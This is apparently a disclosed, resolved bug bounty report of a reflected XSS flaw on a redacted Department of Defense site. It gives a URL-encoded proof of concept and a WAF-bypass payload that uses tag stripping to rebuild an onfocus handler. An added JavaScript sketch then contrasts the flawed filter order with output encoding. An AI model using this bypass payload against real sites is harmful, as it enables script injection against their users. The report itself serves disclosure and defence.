XSS on https://████/ via ███████ parameter

Disclosed: 2022-04-07 19:55:49 By homosec To deptofdefense
Medium
Vulnerability Details
PoC

```
https://████████/██████=█████████%22%20o%3Cbr%3Enfocus=confirm(1337)%20autofocus%20tabindex=1%20xss
```

Payload

```
o<br>nfocus=confirm(1337) autofocus tabindex=1 xss
```

WAF bypass

Tags are removed from user input. This makes it possible to bypass the WAF.

███

## Impact

XSS on https://████████/

## System Host(s)

███

## Affected Product(s) and Version(s)

## CVE Numbers

## Steps to Reproduce

Go to

```
https://█████/██████=████%22%20o%3Cbr%3Enfocus=confirm(1337)%20autofocus%20tabindex=1%20xss
```

## Suggested Mitigation/Remediation Actions
Report Stats
  • Report ID: 1251868
  • State: Closed
  • Substate: resolved
  • Upvotes: 6
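
The report's root cause is an ordering problem: the WAF inspects the raw parameter, and the application's tag removal then rewrites it into something the WAF would have blocked. The sketch below is an added example, not code from the report or the affected site; the WAF rule, the tag stripper, the render functions and the double-quoted attribute reflection context are all assumptions chosen to match the payload shape, and it contrasts the flawed order with context-aware output encoding.

```javascript
// Added example. wafBlocks, stripTags and the render functions are hypothetical
// stand-ins for the behaviour the report describes, not the affected site's code.

// Stand-in WAF rule: reject input that contains an inline event-handler attribute.
function wafBlocks(input) {
  return /\bon[a-z]+\s*=/i.test(input);
}

// Stand-in for the application's tag removal, which runs after the WAF check.
function stripTags(input) {
  return input.replace(/<[^>]*>/g, "");
}

// Encode a value for use inside a quoted HTML attribute.
function encodeAttr(value) {
  return value.replace(/[&<>"']/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Flawed order: the WAF inspects the raw value, tag removal then changes it,
// and the changed value is written into the attribute unencoded.
function renderVulnerable(param) {
  if (wafBlocks(param)) return null;
  return '<input value="' + stripTags(param) + '">';
}

// Corrected: the value is encoded for its output context, so the quote cannot
// close the attribute whatever the earlier filters did or missed.
function renderHardened(param) {
  return '<input value="' + encodeAttr(stripTags(param)) + '">';
}

// Constructed sample: the payload shape from the report after a made-up prefix.
const SAMPLE = 'x" o<br>nfocus=confirm(1337) autofocus tabindex=1 xss';

function demo() {
  return {
    wafOnRaw: wafBlocks(SAMPLE),                  // what the WAF inspected
    wafOnEmitted: wafBlocks(stripTags(SAMPLE)),   // what the page received
    vulnerable: renderVulnerable(SAMPLE),
    hardened: renderHardened(SAMPLE),
  };
}

console.log(demo());
```

Any filter that inspects input should see the value as it will be emitted, after every transformation, and output encoding should not depend on that filter having matched.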